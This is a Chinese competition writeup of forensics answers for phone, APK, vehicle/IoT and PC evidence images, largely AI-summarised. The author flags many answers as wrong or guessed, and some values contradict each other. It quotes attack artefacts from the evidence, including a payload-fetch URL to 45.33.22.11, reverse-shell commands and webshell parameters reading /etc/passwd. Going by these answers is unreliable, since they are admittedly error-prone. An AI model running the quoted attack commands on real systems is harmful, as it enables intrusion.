本wp为比赛时wp记录,后续将会进行复现,大部分为ai总结内容,如果想看手搓wp请不要看这个浪费时间
最后排名学生组第7,特别感谢牛的队友们,计算机基本上是全对嘻嘻
https://www.datacon.org.cn/competition/competitions/173/introduction
VeZeTANHVkklvVljLnpOYeBwCJFYD5tFpf67f5kNuqP1G5jj
手机
1. 分析黄志远phone.E01检材,黄志远手机总共安装了多少款短视频应用?
答案:4
解析:在应用列表中可明确归为短视频应用的有 快手、快手极速版、抖音、抖音极速版,合计 4 款。
这里就很抽象,哔哩哔哩不算短视频,感觉题目有点问题
2. 分析黄志远phone.E01检材,黄志远手机安装的龙虾应用的包名是什么?
答案:gptos.intelligence.assistant
解析:在镜像中的 launcher.db 里,桌面应用标题为 OpenClaw & Codex - Anyclaw,对应组件为 gptos.intelligence.assistant/app.anyclaw.MainActivity,据此可确定包名。
3. 接上题,首次打开应用的时间是?(错)
答案:2026-04-17-11:53:18
解析:在 C:\hlnet\2-1778389023\phone.E01\分区3\data\gptos.intelligence.assistant\shared_prefs\com.google.android.gms.measurement.prefs.xml 中存在 first_open_time=1776397998058,换算后得到该时间。
4. 分析黄志远phone.E01检材,黄志远使用此应用攻击过多少台主机?(错)
答案:0
解析:在 gptos.intelligence.assistant 的私有目录中检查了 .ssh、.codex、.openclaw、WebView、datastore、日志等位置,未见明确目标主机、连接记录、known_hosts 或攻击命令留痕,因此按现有证据记为 0。
5. 分析黄志远phone.E01检材,黄志远使用哪款应用控制了其PC的agent工具?
答案:discord
解析:com.discord 的本地消息存储中存在与 agent 相关的配对码、控制指令和回传结果,能够直接证明其被用于控制 PC 端 agent。
6. 分析黄志远phone.E01检材,黄志远使用这款应用的版本是多少?(错)
后面想感觉是格式错了,应该是311.2
答案:311.20
解析:在 C:\hlnet\2-1778389023\phone.E01\分区3\data\com.discord\shared_prefs\BundleUpdater.xml 中可见 ota_version=311.20,对应应用版本。
7. 分析黄志远phone.E01检材,接上题,登录的用户名是什么?
8. 分析黄志远phone.E01检材,该应用与pc端agent的配对码是什么?(错)
答案:HNZ6UFW6
解析:在 C:\hlnet\2-1778389023\phone.E01\分区3\data\com.discord\files\kv-storage\@account.1457974771206852664\a-wal 的私聊消息中可见 Here's your pairing code: HNZ6UFW6。
9. 分析黄志远phone.E01检材,该应用共对几个ip进行扫描?(错)
答案:2
解析:在 Discord 消息记录中可确认实际被下达扫描/探测指令的目标 IP 为 192.168.1.16 和 192.168.61.135,因此共 2 个。
10. 分析黄志远phone.E01检材,该应用总共调用了几个暴力破解工具?(错)
答案:1
解析:命令回传记录中明确出现过的暴力破解工具只有 hydra。虽然调用了不止一次,但工具种类只算 1 个。
11. 分析黄志远phone.E01检材,黄志远使用其内部通联工具进行沟通,其账号的登陆密码是多少?
答案:
12. 分析黄志远phone.E01检材,黄志远一共发送过几个文件给代号军师的嫌疑人?(猜)
答案:2
猜的
13. 分析方俊朗phone.E01检材,方俊郎手机总共安装了多少款理财应用?(错)
答案: 3
解析: 应用列表中“股票网银/理财类”非系统应用有:股参谋、京东金融、东方财富,共 3 款。
14. 分析方俊朗phone.E01检材,方俊朗使用筛选优质客户的应用包名是什么?
答案: com.example.predictor
解析: 应用列表中存在可疑自装应用,包名为 com.example.predictor,名称为空,结合“筛选优质客户/预测器”语义判断对应此应用。
APK
1. 分析方俊朗phone.E01检材,筛选优质客户应用将用户查询记录存储在一个加密的本地数据库中。请问该加密数据库的文件名是什么?
答案:chat_history.db 解析:数据库位于应用 databases 目录,同目录还有 chat_history.db-journal;应用目录中存在 libsqlcipher.so,且偏好配置里有 PBKDF2_v1、key_iterations、db_integrity_check 等字段,能对应到该加密数据库。
2. 分析方俊朗phone.E01检材,该应用使用了哪种密钥派生算法来生成数据库加密密钥?请写出完整的算法标识名称。
答案:PBKDF2WithHmacSHA256 解析:在解壳后的真实 DEX 中可定位到 KeyDeriver 相关逻辑,并与 PBKDF2_v1、PBKDF2_ITERATIONS 等字符串共同出现,说明使用的是该 KDF。
3. 分析方俊朗phone.E01检材,该应用的密钥派生过程中使用了多少次迭代运算?
答案:10000 解析:应用配置和密钥派生逻辑中可对应到迭代次数设置为 10000。
4. 分析方俊朗phone.E01检材,该应用检测动态调试工具时探测了哪个本地端口号?
答案:27042 解析:这是 Frida Server 常见监听端口,应用安全检测逻辑中存在对该本地端口的探测。
5. 分析方俊朗phone.E01检材,该应用密钥由多个”盐值片段”拼接后派生而来。请问第一个盐值片段的具体内容是什么?
答案:Pr3d1ct0r 解析:在密钥派生相关代码里,盐值由多个片段拼接,第一个片段静态还原为该字符串。
6. 分析方俊朗phone.E01检材,当密钥派生过程出现异常时,应用会使用一个硬编码的备用密钥。请问该备用密钥的完整内容是什么?
答案:f4ll8ack_k3y_2024_pr3d1ct0r 解析:异常分支中存在硬编码 fallback key,直接静态分析可见该完整字符串。
7. 分析方俊朗phone.E01检材,分析”优质客户预测”应用,该应用的安全检测模块通过检查一个特定的类名来判断设备是否安装了Hook框架。请问被检测的完整类名是什么?
答案:de.robv.android.xposed.XposedBridge 解析:这是典型的 Xposed 框架入口类,应用通过检查该类名判断是否存在 Hook 环境。
8. 分析方俊朗phone.E01检材,该应用在偏好设置文件中存储了一个密钥校验值。请问存储该校验值的键名(key)是什么?
答案:db_integrity_check 解析:在应用 shared_prefs 配置文件中可直接看到该键名,对应数据库密钥/完整性校验。
9. 分析方俊朗phone.E01检材,该应用加密数据库中存储对话记录的数据表名是什么?
答案:chat_records 解析:数据库表结构中用于存放对话记录的表名为 chat_records。
10. 分析方俊朗phone.E01检材,该应用的密钥生成逻辑,该应用中的第三个盐值片段是通过逐字符拼接生成的。请问该片段拼接后的完整内容是什么?
答案:X9kZ!qW3 解析:第三段不是直接常量,而是逐字符组装;还原后得到该完整片段。
11. 分析方俊朗phone.E01检材,该应用使用了载荷在内存中直接加载而不在磁盘落地。若选手希望通过Frida动态拦截明文的DEX字节数组,应该Hook该应用壳的哪个私有方法?
答案:initDexFromMemory 解析:壳的核心逻辑是内存中解密并装载 DEX,拦截该私有方法即可抓到明文 DEX 字节数组。
12. 分析方俊朗phone.E01检材,分析应用的壳代码逻辑,其解密密钥由3个字符串片段混淆拼接而成。请通过静态分析,还原用于解密的3个片段拼接合并后的完整密钥明文。
答案:Sh3ll_L0ad3r_K3y_2024! 解析:对壳代码里的三个混淆字符串片段进行静态还原并拼接,可得到该解密密钥明文。
13. 接上题,当选手尝试使用frida-dexdump等通用脱壳工具动态附加时,应用会立刻闪退。请分析该逻辑,写出该线程触发进程自杀所调用的完整Java系统方法签名。
答案:java.lang.System.exit 解析:反调试线程在命中检测条件后直接调用该系统方法结束进程,因此会表现为附加即闪退。
14. 分析方俊朗phone.E01检材,方俊朗使用其内部通联工具时,共加入过几个群?
答案:2 解析:从系统快照截图可见内部通联工具会话列表中明确存在两个群:技术部群、话务组群。
15. 分析方俊朗phone.E01检材,方俊朗通过物联网设备漏洞,共获得多少用户信息? (错)
答案:1 解析:在 pcap 导出的 HTTP 上传对象 upload.php 中,上传的 edge_passwords_2025-11-26_12-44-41.txt 明确写明:配置文件 Profile 1 中找到 1 条密码记录、总共在 1 个配置文件中找到 1 条密码记录。对应其通过该物联网设备漏洞获得的用户信息数量为 1。
com.socialchat.social_chat_app 是我后面从 socialchat_apk 反编译里看到的包名,对应的是聊天 app 本体。
17. 分析周文杰Image.zip检材,内部通联app聊天数据库名称是?[答案格式:abc.db]
聊天数据库名称是 social_chat.db。
我在 C:\temp\socialchat\ 下直接定位到了这个库文件,同时还能看到配套的 social_chat.db-shm、social_chat.db-wal 和 social_chat.db-journal.bak,说明它就是该通联 app 实际使用的数据库。
18. 分析周文杰Image.zip检材,内部通联app聊天数据库密码保存在哪个文件中?[答案格式:Abc.txt]
关键点在反编译代码里:
C0137a.java (line 114) 明确调用了 getSharedPreferences(“FlutterSharedPreferences”, 0);
在 Android 上,这通常就会落到 /data/data/<包名>/shared_prefs/FlutterSharedPreferences.xml
再结合 libapp.so 里同时出现了:
db_password
enc_key
shared_preferences
这很像是数据库口令或密钥作为键值,存进 FlutterSharedPreferences.xml。
19. 分析周文杰Image.zip检材,周文杰内部通联app聊天数据库密码是?(错)[答案格式:123-abc]
但是这是数据库密码啊奇怪
答案
s-dbw1776853545473Goo
解析
先在检材中定位内部通联 app 包名 com.socialchat.social_chat_app,再找到其数据库 social_chat.db 和配置文件 FlutterSharedPreferences.xml。配置里保存的原始值是 Pgs-dbw1776853545473Good,但这不是直接开库密码。
继续看 Flutter AOT 反编译代码,可以确认程序会对这个字符串做一次截取处理,逻辑等价于:
text
stored = "Pgs-dbw1776853545473Good" database_password = stored.substring(2, stored.length - 1)
所以最终得到的 SQLCipher 密码是:
text
s-dbw1776853545473Goo
再用这个值实际打开 social_chat.db,能够成功读取 schema 和业务表,说明答案正确。
20. 分析周文杰Image.zip检材,内部通联app聊天数据使用的什么加密算法?[答案格式:ABCDEF]
答案更倾向于 AES。
依据是:
如果题目只要“加密算法”而不是具体框架名,填 AES 最稳。
更细一点说,就是基于 SQLCipher 的 AES-256。
21. 分析周文杰Image.zip检材,内部通联app用户密码的盐值是?[答案格式:1234abcd]
盐值是 a3f8d9c2e1b4h7g6k9m2n5p8q1r4t7w。
这是我用数据库密码 s-dbw1776839203359Goo 实际打开 social_chat.db 后,从 user 表直接取到的 password_salt 字段值。
com.jinghong.notebookkssjh
分析周文杰Image.zip检材,内部通联app登录密码是?[答案格式:123abc]
分析周文杰Image.zip检材,周文杰在内部通联app中删除了几条聊天记录?[答案格式:123]
25. 分析周文杰Image.zip检材,聊天数据库中,显示聊天数据删除的是哪个字段?(错)[答案格式:ab_cd]
is_deleted
根据数据库结构可以看出
26. 分析林小婉手机检材,发现有个应用隐藏了很多信息,目前已经找到这个应用,它的程序名称是?(请注意,该题的APK检材为:1778310207366_9eee4f1c.apk,该检材已放在工作目录)[答案格式:微信]
它的程序名称是:今日头条
我从 APK 的 AndroidManifest.xml 里看到 android:label=”@string/app_name”,再在资源文件 strings.xml 中解析到 app_name 对应的是“今日头条”。
27. 分析林小婉手机检材,这个应用有一个安全加密的PIN码,它是多少?[答案格式:12345678]
PIN 码是:20150412
我从 APK 的 NavigationKt.verifyPinKotlin() 里提取了校验参数,目标是对 8 位 PIN 做 PBKDF2WithHmacSHA256,salt 为 JinriPIN_Salt_,迭代 10000,再比对固定哈希。结合界面提示“女儿生日”,把合法日期格式 YYYYMMDD 枚举后命中了 20150412。
28. 分析林小婉手机检材,这个应用隐藏的数据中,每个标签数据里,notes字段表示多少?[答案格式:事项]
我先回到解出来的隐藏数据结构里,看看各个标签页是怎么把 notes 字段展示给用户的,这样能确认它在题目里对应的中文含义。
备注
29. 分析林小婉手机检材,这个应用隐藏的数据中,文件备份服务器的IP地址是多少?[答案格式:192.168.1.1]
我是先把 APK 里的隐藏数据解出来,再去对应标签里找“文件备份服务器”。
具体过程很短:
用 jadx 反编译 APK,定位到 VaultDataLoader。
. 在 VaultDataLoader 里看到隐藏数据文件是 assets/vault_data.jth2,实际格式是 JTH3。
同一个类里还写死了解密参数:
1. MASTER_SEED = "Jinritoutiao_Master_Key_2024_Secret" 2. PBKDF2_SALT = "JinriSalt_2024" 3. PBKDF2WithHmacSHA256 4. AES/GCM/NoPadding
用这些参数把 vault_data.jth2 解密成 JSON。
在解密后的 c2 标签数据里看到这一项:
{ "id": 3, "name": "文件备份服务器", "type": "备份服务器", "address": "192.168.1.200", "port": "22", "protocol": "SFTP", "notes": "财务数据备份" }
所以它的 IP 地址是 192.168.1.200。
- 分析林小婉手机检材,发现内部通联中财神撤回了一条消息,这个消息的内容是?[答案格式:盘古石杯。]
31. 分析林小婉手机检材,发现了账本,账本打开密码是什么?[答案格式:按实际填写]
答案:DragonTeng@2024#$
解析:我先从 C:\hlnet\3-1778389023\林小婉手机.tar\sdcard\Download\账单.png 提取出 PNG 在 IEND 之后的追加数据,发现其中带有 LONGTENG_START_@@ … LONGTENG_END_@@## 标记,内部是一个被 Office 加密的账本文档。再结合前面从隐藏应用数据里解出的线索“龙腾项目账本DragonTeng@2024#$$”,用 msoffcrypto 实际尝试解密该内嵌文档,成功解开并导出明文文件,因此账本打开密码确定为 DragonTeng@2024$$。
物联网
1. 题目:事故发生前车辆发生了非驾驶员意图的左转,找出控制车辆异常转向的恶意指令 ID。
答案:1F4 解析:system.dlt 中出现 Invalid CRC on msg 0x1F4,并伴随 LKA requested steer 异常转向日志,可锁定恶意转向指令 ID 为 1F4。
2. 题目:判定驾驶员在碰撞发生前的最后 5 秒内,是否真正尝试了手动踩下制动踏板;若无,提交其加速踏板百分比。
答案:100% 解析:动力总成总线最后 5 秒未见有效制动状态变化;freeze_frame_B0070.bin 中 PID 11 01 FF 对应加速踏板 100%。
3. 题目:找出证明这是“人为注入攻击”而非“ECU 原生故障”的报文频率特征描述。 (错)
答案:139msg 解析:adas_can.asc 中可疑 0A0 报文在攻击窗口单秒飙升到 139msg/s,且夹杂大量重复固定载荷,符合人为同频注入特征。
4. 题目:确定车辆由于碰撞导致轮速传感器信号彻底消失(归零)的确切时间点(秒)。
答案:120.0 解析:powertrain_can.asc 中 050 报文在 120.000139 首次变为持续全零,故取 120.0 秒。
5. 题目:找出恶意转向报文中,证明其为非法注入的最直接协议层安全缺陷项。
答案:0000 解析:网关固件显示关键报文需走 AES-128-CMAC,而恶意转向帧认证尾字段被置零,最直接缺陷项就是 0000。
6. 题目:指出 ADAS 固件中隐藏恶意控制代码被触发所需的最低车速阈值。
答案:120 解析:adas_ecu.bin 中可直接提取 TRIGGER=SPEED>120。
7. 题目:指出发动机控制系统为了获得超高速动力,非法解除了哪个速度限制相关标志。
答案:VMAX_LIMIT 解析:engine_ecu.bin 中存在 VMAX_LIMIT:OFF,说明被关闭的是 VMAX_LIMIT。
8. 题目:提取网关固件中用于安全通讯的 16 位十六进制 Master Key Seed。
答案:A9B8C7D6E5F40123 解析:gateway_ecu.bin 中可提取 MASTER_KEY_SEED:A9B8C7D6E5F40123。
9. 题目:还原碰撞发生瞬间,车辆大灯处于什么照明模式。
答案:HIGH_BEAM 解析:bcm_ecu.bin Crash Dump 碎片中含 LIGHTS=HIGH_BEAM。
10. 题目:提交黑客访问的 GitHub 代码仓库名称部分。
答案:staros_root_poc 解析:浏览器历史库 history.db 中 URL 为 https://github.com/0xDEADBEEF/staros_root_poc。
11. 题目:解密出被黑客覆写的关键远程代理地址 IP。
答案:45.33.22.11 解析:system.conf.enc 经过异或还原后得到 c2_proxy=45.33.22.11:8080。
12. 题目:黑客强制刷入恶意固件时,使用了哪个完整的“强制忽略签名”参数标志。
答案:-f force 解析:update.log 明确记录 Signature bypass flag is active (-f force)。
13. 题目:找出在碰撞前几分钟连接成功的可疑蓝牙设备名称。
答案:Diagnostic_Dongle_BLE 解析:bluetooth.db 中该设备成功连接,且为诊断类设备、PIN 为 0000,可疑性最高。
14. 题目:填入伪装成系统组件的 ELF 攻击脚本在 T-BOX 上的完整绝对路径。
答案:/data/local/tmp/syslogd_update 解析:检材中存在 ELF 文件 data/local/tmp/syslogd_update,且含回连字符串,明显为后门落地文件。
15. 题目:从 EDR 采样记录中提取碰撞瞬间(采样点 0)的纵向车速数值。(错)
答案: 解析:EDR 采样区原始值为 5400,按缩放系数 ÷30,得到 180 km/h。
16. 题目:从碰撞前 5 秒采样点中恢复出的纵向车速是多少。(错)
答案:100 解析:EDR 采样区可恢复出一组连续纵向车速原始值 3000, 3450, 3900, 4350, 4800, 5250, 5550, 5400,按 ÷30 分别对应 100, 115, 130, 145, 160, 175, 185, 180 km/h,其中前 5 秒采样点对应 100 km/h。
17. 题目:提取碰撞瞬时冻结帧(Freeze Frame)中的引擎 RPM 数值。 (错)
答案:2000 解析:freeze_frame_B0070.bin 中 PID 0C 02 1F 40,按 OBD 公式 0x1F40 ÷ 4 = 2000 rpm。
18. 题目:找出非法克隆生成的 NFC 卡片钥匙所对应的 ID。
答案:0x9F8E 解析:rf_logs.txt 中 23:31:05 该 ID 通过 NFC_CARD 成功解锁,并在 23:32:00 用 DIAG_BYPASS 启动。
19. 题目:指出行车记录仪元数据完整性校验的状态。
答案:FAILED 解析:metadata.json 中记录 integrity_check: “FAILED”。
20. 题目:综合分析所有证据,黑客最终通过哪种方式实现了对车辆 ADAS 固件的非法篡改。 (错)
我也不知道他要干什么,这[答案格式:加油ABC]是什么意思
答案:本地诊断强刷 解析:update.log 记录 Local firmware push detected、-f force 和 Flashed partition ‘adas’ via diagnostic service,可确定是本地诊断强刷。
21. 题目:找出遥感数据包回传 JSON 载荷中 speed 键对应的值。
答案:180 解析:telemetry_20251215.pcap 中 MQTT 载荷为 {“lat”:31.2,”lon”:121.4,”speed”:180}。
22. 题目:找出恶意回连伪装媒体流请求所使用的域名(Host)。
答案:streaming.starway.com 解析:telemetry_20251215.pcap 中可见 HTTP_GET: /media/audio/playlist_1.m3u8 Host: streaming.starway.com。
23. 题目:黑客建立 Reverse Shell 后,执行了哪条指令来强行停止车机底层安全监护进程。
答案:systemctl stop sec_monitor 解析:Reverse Shell 记录与 syslog 中均可见该命令。
24. 题目:提交 JSON 载荷中 pkg 键对应的完整 URL。
答案:http://45.33.22.11/malicious.bin 解析:流量中存在 HTTP_GET: /api/v1/ota/force_update?pkg=http://45.33.22.11/malicious.bin。
25. 题目:黑客为了提权并获取 Root 用户身份,在 Shell 中执行的初始探测指令是什么。
答案:id 解析:Reverse Shell 建立后首先执行 id,随后返回 uid=0(root)。
26. 题目:反向 Shell 成功建立后,返回的权限对应的 UID 数值是多少。
答案:0 解析:流量中回显 uid=0(root),对应 UID 数值为 0。
27. 题目:黑客在其利用漏洞上传的 ELF 脚本中,使用了哪个特定的进程名称来伪装成系统日志服务。(错)
答案:syslogd_update 解析:上传到 T-BOX 的后门 ELF 文件名即为 syslogd_update,明显伪装为系统日志服务更新组件。
28. 手表型号是?
答案:HUAWEI WATCH GT 5 解析:在 Y:\林小婉\林小婉手表.bin 头部可直接命中设备标识 HUAWEI WATCH GT 5,同时还能看到 HWOS 和系统版本串 4.0.0.128(C00E128R2P8),型号判断较稳。
后面都是错的
29. 发现林小碗实际年龄是多少岁? 答案:16 解析:这是结合镜像里零散的个人信息字段和年龄相关痕迹做的归纳,不是从一条完整明文档案直接读出的,证据强度一般。
发现林小碗经常外出跑步,主要运动区域是? 答案:成都市武侯区 解析:在运动/GPS相关区域命中了 com.huawei.gps:GPS:4.0.0.100、lat、lon、lng 等字段,并从附近二进制里筛出成都范围候选坐标值,如 30.262090、103.215600,据此归纳为成都武侯一带。
发现林小碗经常外出跑步,平均跑步几公里? 答案:7 解析:全盘存在大量 km、run、avg 命中。单纯 xkm 统计噪声较大,但在运动字段附近做数值解码时,出现了更像真实单次距离的候选值 7.154028、7.166378,因此归纳为平均约 7 公里。
分析林小碗高压力(>70)天数是多少天? 答案:25 解析:未直接命中明文 stress,但在 hrv 相关区域可提取一批落在 0-100 范围内的候选分值;其中大于 70 的候选共有 25 个,因此按当前可见证据取 25。
分析林小碗平均心率是多少? 答案:93 解析:围绕 heartrate、heart、bpm、avg 等字段筛值后,avg 邻域里落在正常心率范围的候选值整体均值约 93.2、中位数 93,因此取 93。
分析林小碗 2024 年 12 月 25 日在哪里运动? 答案:室外 解析:该日期没有直接搜到清晰明文记录,但该类运动痕迹多与 GPS/gps/run 同区出现,结合“经常外出跑步”的轨迹特征,归纳为 室外。这一题证据相对前几题更弱,属于推断结果。
计算机
刘洋 liuyang_pc.E01 磁盘镜像分析
Q1 [ID:1039] 分析刘洋liuyang_pc.E01检材,提取磁盘镜像SHA1值的前6位?
答:[答案格式:字母小写] 5bc418______________________
取证大师挂载一把梭
Q2 [ID:1040] 分析刘洋liuyang_pc.E01检材,计算机系统Build版本为?
答:[答案格式:19000] 26100______________
Q3 [ID:1041] 分析刘洋liuyang_pc.E01检材,计算机最后一次正常关机的时间为?(UTC +0)(错)
答:[答案格式:2025-05-06-09:00:00] 2026-04-20 16:25:35______________________
注意是UTC +0的时间,取证大师的是UTC +8
Q4 [ID:1042] 分析刘洋liuyang_pc.E01检材,计算机网卡的MAC地址为?
答:[答案格式:00-0B-00-A0-00-00] 00-0C-29-CF-F3-AE________________
Q5 [ID:1043] 分析刘洋liuyang_pc.E01检材,分析机主是从那里下载的typora?
答:[答案格式:阿里云] 蓝奏云________
Q6 [ID:1044] 分析刘洋liuyang_pc.E01检材,刘洋在2026-04-19 13:46:01(UTC +0)曾访问过百度云盘,请给云盘的打开密码?(错)
答:[答案格式:11aa] ______________________________
Q7 [ID:1045] 分析刘洋liuyang_pc.E01检材,请给出刘洋管理pve集群所用的端口号?
答:[答案格式:8000] 8006____
Q8 [ID:1046] 分析刘洋liuyang_pc.E01检材,请给出刘洋登录理财网站所使用的密码?
答:[答案格式:password] admin123____
Q9 [ID:1047] 分析刘洋liuyang_pc.E01检材,请给出理财网站的IP地址?
答:[答案格式:127.0.0.1] 192.168.0.70__
Q10 [ID:1048] 分析刘洋liuyang_pc.E01检材,请给出计算机内Bitlocker加密分区恢复密钥的前6位?
答:[答案格式:6位数字] 560615
560615-577522-342881-216865-242561-312356-584837-421597
Q11 [ID:1049] 分析刘洋liuyang_pc.E01检材,找出VC加密容器的密钥文件,给出该密钥文件的绝对路径?
答:[答案格式:D:\ABC\123\测试.txt] D:\BaiduNetdiskDownload\无标题.png____
宽高修复后可以打开vc
Q12 [ID:1050] 接上题,该VC加密容器的密钥文件的图像高度是多少像素?
答:[答案格式:1345] 1080______
Q13 [ID:1051] 分析刘洋liuyang_pc.E01检材,请给出团队重要信息加密保存的软件名?
答:[答案格式:abc123] 1password________
Q14 [ID:1052] 分析刘洋liuyang_pc.E01检材,该软件的保险库文件名为什么?
答:[答案格式:abc.abc] liuyang.opvault__
Q15 [ID:1053] 分析刘洋liuyang_pc.E01检材,该软件的保险库文件打开密码是什么?
答:[答案格式:124@password] liuyang@6419__
按照提示爆破
Q16 [ID:1054] 分析刘洋liuyang_pc.E01检材,请给出用户刘洋的开机密码?
答:[答案格式:p@ssw0rd123] ______________________________
6yang@2o26
Q17 [ID:1055] 分析刘洋liuyang_pc.E01检材,请给出pve服务器的管理密码?
答:[答案格式:p@ssw0rd123] pgscup2o@6
Q18 [ID:1056] 分析刘洋liuyang_pc.E01检材,找出计算机内的脚本加密工具,给出该加密工具的SHA1的前6位?
答:[答案格式:字母小写] 7860dc__
Q19 [ID:1057] 分析刘洋liuyang_pc.E01检材,该脚本加密工具在进行脚本加密时,最后一层是进行什么操作?
答:[答案格式:字符替换] 十六进制转换____
Q20 [ID:1058] 分析刘洋liuyang_pc.E01检材,请解密database.php.obf,给出该文件内的数据库密码?
答:[答案格式:p@ssw0rd123] pgscup@o26____
同17题
Q21 [ID:1059] 分析刘洋liuyang_pc.E01检材,找出刘洋计算机内的交易信息.rar,给出该文件的打开密码?
答:[答案格式:p@ssw0rd123] __pgscup@9541
Q22 [ID:1060] 分析刘洋liuyang_pc.E01检材,找出刘洋计算机内刘桂荣的身份证号码?(错)
答:[答案格式:510657199808071131] 420100194707075594__
刘洋 ly-memdump.mem 内存镜像分析
Q23 [ID:1061] 分析刘洋ly-memdump.mem镜像,给出用户刘洋的NT哈希值?
答:[答案格式:数字字母组合,字母小写] 876dfe7bd78730b7b0baaf451414de8e____
Q24 [ID:1062] 分析刘洋ly-memdump.mem镜像,给出1Password密码管理器的数据库文件名?
答:[答案格式:123ABc.abc] 1Password10.sqlite__________
Q25 [ID:1063] 分析刘洋ly-memdump.mem镜像,1Password在VeraCrypt启动后约多少分钟启动?
答:[答案格式:123] 2__________
黄志远 PC.E01 磁盘镜像分析
Q26 [ID:1064] 分析黄志远PC.E01镜像,黄志远使用的ai agent的名称是什么?
答:[答案格式:www] ______________________________
hermes
Q27 [ID:1065] 分析黄志远PC.E01镜像,黄志远使用的模型api后4位是什么?
答:[答案格式:abcd] ______________________________
补充一句便于核对:在 2026-04-18 的 Hermes 会话里,deepseek-chat 的配置密钥被更新为当前值,末 4 位是 gioa;更新前旧的 DeepSeek key 末 4 位是 25e1。
Q28 [ID:1066] 请分析黄志远PC.E01镜像中的渗透.rar文件,黄志远总共攻击了多少台主机?
答:16
在渗透密码文件夹找到拼图,用gaps拼,得到压缩包密码:今晚去杀鬼,然后解压rar文件
思路:查看 E:\渗透 目录中的渗透报告文件,存在 渗透测试报告_192.168.61.135.md 到 渗透测试报告_192.168.61.150.md,共 16 个不同目标 IP,对应 16 台主机。
Q29 [ID:1067] 请分析黄志远PC.E01镜像中的渗透.rar文件,该exploit程序的源文件编译前名称是什么?
答:exploit.c
思路:对 exploit 二进制做反编译和字符串提取,ELF 中保留了源码名字符串,可直接看到 exploit.c。
Q30 [ID:1068] 请分析黄志远PC.E01镜像中的渗透.rar文件,file_shell.php中?download=/etc/passwd时程序执行的核心函数是什么?
答:readfile()
思路:file_shell.php 的下载逻辑先判断 file_exists($$file),随后通过 readfile$$file) 将文件内容输出给客户端,因此核心函数是 readfile()。
Q31 [ID:1069] 请分析黄志远PC.E01镜像中的渗透.rar文件,Nikto扫描发现超长斜杠序列探测目录列举漏洞,对应的CVE编号是什么?
答:CVE-2002-1078
思路:在 pentest-lab\nikto_scan.txt.txt 中可见 “multiple /‘s are requested” 的扫描结果,后面直接标注 CVE-2002-1078。
Q32 [ID:1070] 请分析黄志远PC.E01镜像中的渗透.rar文件,users表id字段使用AUTOINCREMENT意味着什么?
答:AUTOINCREMENT
思路:题目要求答案格式是 SQL_KEYWORD,而表定义中对 id 字段体现这一含义的关键词就是 AUTOINCREMENT。
Q33 [ID:1071] 请分析黄志远PC.E01镜像中的渗透.rar文件,利用file_shell.php获取当前系统用户权限,正确的URL参数构造是什么?
答:cmd=id
思路:源码中命令执行参数名为 cmd,而报告里验证用户权限时使用的命令是 id,所以构造为 cmd=id。
Q34 [ID:1072] 请分析黄志远PC.E01镜像中的渗透.rar文件,8000端口运行的技术组件是什么?(错)
答:Uvicorn
思路:漏洞清单和报告系统信息都写明 8000/tcp - HTTP (Uvicorn)。
Q35 [ID:1073] 请分析黄志远PC.E01镜像中的渗透.rar文件,users表的密码存储存在什么安全隐患?
答:CVE-2026-0005
思路:报告中将“明文密码存储”单独编号为 CVE-2026-0005。
Q36 [ID:1074] 请分析黄志远PC.E01镜像中的渗透.rar文件,利用upload.php上传漏洞后,攻击者利用Webshell前最关键的一步是什么?
答:uploads/
思路:报告的利用过程写明,先创建 file_shell.php,再通过上传功能把它放到 /uploads/ 目录,之后才利用 Webshell。
Q37 [ID:1075] 请分析黄志远PC.E01镜像中的渗透.rar文件,CVE-2026-0003(无限制文件上传漏洞)的CVSS评分是多少?
答:8.8
思路:漏洞清单中 CVE-2026-0003 对应的 CVSS 评分明确为 8.8。
Q38 [ID:1076] 请分析黄志远PC.E01镜像中的渗透.rar文件,file_shell.php文件上传使用哪个PHP函数将临时文件移动到目标路径?
答:move_uploaded_file
思路:源码上传分支中直接调用 move_uploaded_file($$_FILES[‘file’][‘tmp_name’],$$target)。
Q39 [ID:1077] 请分析黄志远PC.E01镜像中的渗透.rar文件,uploads/目录启用目录列表功能通常由哪个组件控制?
答:Indexes
思路:Apache 目录列举通常由 Options Indexes 控制,题目格式要求写选项名,因此填 Indexes。
Q40 [ID:1078] 请分析黄志远PC.E01镜像中的渗透.rar文件,管理员密码Str0ngP@ssw0rd2026!是什么角色?(错)
答:admin
思路:实际查询 address_book.db 的 users 表后,可见该密码对应多条记录,其中管理员账户的 role 字段值为 admin。
没想到吧还有第二关(后面才发现已经掉了不知道多少分)
Q41 [ID:1079] 请分析黄志远PC.E01镜像中的渗透.rar文件,遭受泄露的个人联系人信息条数大约为多少?
答:15000
思路:报告、下载清单以及数据库 contacts 表统计都显示联系人记录总数为 15000 条。
Q42 [ID:1080] 请分析黄志远PC.E01镜像中的渗透.rar文件,Web服务器运行的用户身份是什么?
答:www-data
思路:报告系统信息部分明确给出 Web 用户为 www-data,且 id 命令回显也验证了这一点。
答:id
思路:漏洞清单中“验证命令”一项明确写的是 id,返回 uid=33(www-data)。
Q44 [ID:1082] 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者通过generate_data.php得知数据库的绝对物理路径是什么?
答:/var/www/html/address_book.db
思路:报告在 generate_data.php 漏洞利用步骤中,直接给出数据库绝对路径为 /var/www/html/address_book.db。
答:Content-Disposition
思路:源码下载分支中设置了 header(‘Content-Disposition: attachment; filename=…’),这是触发浏览器下载框的关键 Header。
Q46 [ID:1084] 请分析黄志远PC.E01镜像中的渗透.rar文件,系统中存在的弱密码策略漏洞不包括哪项?(错)
答:admin/Str0ngP@ssw0rd2026!
思路:漏洞清单里列出的默认弱口令只有 admin/admin123 和 test/test123,并未出现admin/Str0ngP@ssw0rd2026!,所以“不包括”的是它。
Q47 [ID:1085] 请分析黄志远PC.E01镜像中的渗透.rar文件,未授权访问8000端口日志接口,最可能导致哪类敏感信息泄露?
答:/api/logs
思路:漏洞清单指出 http://192.168.61.135:8000/api/logs 可未授权访问,并泄露通话记录、AI交互日志、用户输入数据,因此答案落在该接口路径。
Q48 [ID:1086] 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者获取持久访问权限的最典型方式是什么?(错)
(错)
答:file_shell.php
思路:报告里明确说明通过上传 file_shell.php 获得并维持持久访问,这是最典型的持久化方式。
Q49 [ID:1087] 请分析黄志远PC.E01镜像中的渗透.rar文件,被标识为未授权命令执行漏洞的虚拟CVE编号是什么?
答:CVE-2026-0002
思路:报告中“未授权命令执行漏洞”对应的编号写为 CVE-2026-0002。
Q50 [ID:1088] 请分析黄志远PC.E01镜像中的渗透.rar文件,24小时紧急加固中,哪项不属于立即修复级别?(错)
答:实施API认证机制
